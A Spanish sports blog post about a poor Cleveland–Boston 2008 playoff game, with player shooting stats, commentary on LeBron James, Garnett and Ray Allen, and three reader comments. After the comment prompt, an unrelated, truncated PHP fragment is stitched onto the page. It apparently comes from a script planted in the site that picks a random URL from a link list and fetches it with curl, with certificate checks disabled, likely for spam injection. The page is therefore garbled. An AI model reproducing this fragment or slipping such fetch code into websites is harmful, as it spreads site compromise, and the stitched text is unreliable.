Partido Nulo

07 de May de 2008 por TheDeerHunter

(CLE 72 – BOS 76)

Los fríos números: (Top manta)
1.-Lebron James 2-18 TC; 0-6 3p; 10 pérdidas; -7 parcial con él en pista
2.-Paul Pierce 2-14 TC; 0-3 3p; 6 pérdidas; -14 parcial con él en pistaLeBron desesperado
3.-Ray Allen 0-4 TC; 0-3 3p; 4 pérdidas; 0 puntos
4.-Delonte West 2-10 TC; 0-3 3p ….

Parece que se pusieron de acuerdo anoche para ofrecernos una castaña de partido en el “Banknorth” Garden de Boston. Los Celtics estuvieron a punto de batir su récord en menor anotación de puntos de un partido de playoffs, únicamente empeorado por unos 66 ptos que anotó contra los Pistons en el 2002. Por encima de estos dos, hay 291 partidos de playoffs donde Boston ha anotado más (se dice pronto). Como tantas y tantas noches al “Elegido” le llegó el balón a las manos cuando quedaba menos de medio minuto para el final con la posibilidad de ¡¡ empatar !!! el partido. También como en anteriores momentos ya históricos Lebrón penetró con fuerza hacia canasta, saltó como él sólo sabe hacerlo y… falló una bandeja fácil poniéndole la guinda a su ridículo 11% de acierto.


Boston, con uno de los partidos más lamentables de su historia se llevó “regalado” el primer punto de la eliminatoria.

No estamos seguros si es casualidad, pero lo cierto es que desde que se instauró la primera ronda a 7 partidos nos estamos acostumbrando a asistir (puntualmente, eso sí) a esperpénticas sorpresas negativas de esta magnitud, en las que jugadores del más alto copete sufren un súbito cortocircuito mental o físico.
Garnett cobra protagonismo No vamos a descubrir ahora que 82 partidos es mucho y probablemente 2 más o menos no deben ser el origen exácto del problema. Como aficionados no nos gustaría renunciar a esos partidos, sobre todo a los de playoff… no obstante hay que ser conscientes de que conforme más partidos se acumulen en las piernas de los jugadores más posibilidades habrá de que no respondan en un momento dado, que interpretamos es lo que sucedió anoche.

Más allá de todo esto, las conclusiones que se pueden extraer son pocas. A Ray Allen se le ve muy cascado y ya no es una cuestión sólo de anoche. En su lugar, si a Garnett le hemos visto este año renunciar a gran parte de su tradicional protagonismo, paulatínamente va a ir recuperándolo conforme se acerquen a una posible final. Anoche él sí estuvo muy bien y personificó la salvación de Boston, bien secundado por Rondo, Cassell y Perkins.
Por Cleveland el que se salvó fue Ilgauskas y en cierto sentido Wallace… pero el resto volvieron a estar nefastos. A pesar de todo tuvieron opciones de victoria incluso.

En definitiva, fue un partido muy atípico y nos aporta poco a la hora de analizar cómo se va a desarrollar la eliminatoria. Estamos seguros que los siguientes poco van a parecerse a éste.

Comenta

3 comentarios a esta entrada

  1. Gallis dice:
    #1

    Por dios de mi vida que partido más horroroso…se podrían decir muchas cosas, pero para qué…realmente clavado eso de partido nulo, jeje.

    Joder, como esto se repita, deberían inhabilitar a estos 2 equipos, jojojojo…

      Citar

  2. Viva_Dirk dice:
    #2

    Pues si horrible partido, ves el 2 de 18 de Lebron y piensas que tuvo que hacer un pésima selección de tiro, cuando resulta que el tio falló lo menos 5 bandejas faciliiiiiiiiisimas.

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    Aún fallo pocos Lebron. Se ve que echa de menos al gran Ira Newble.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>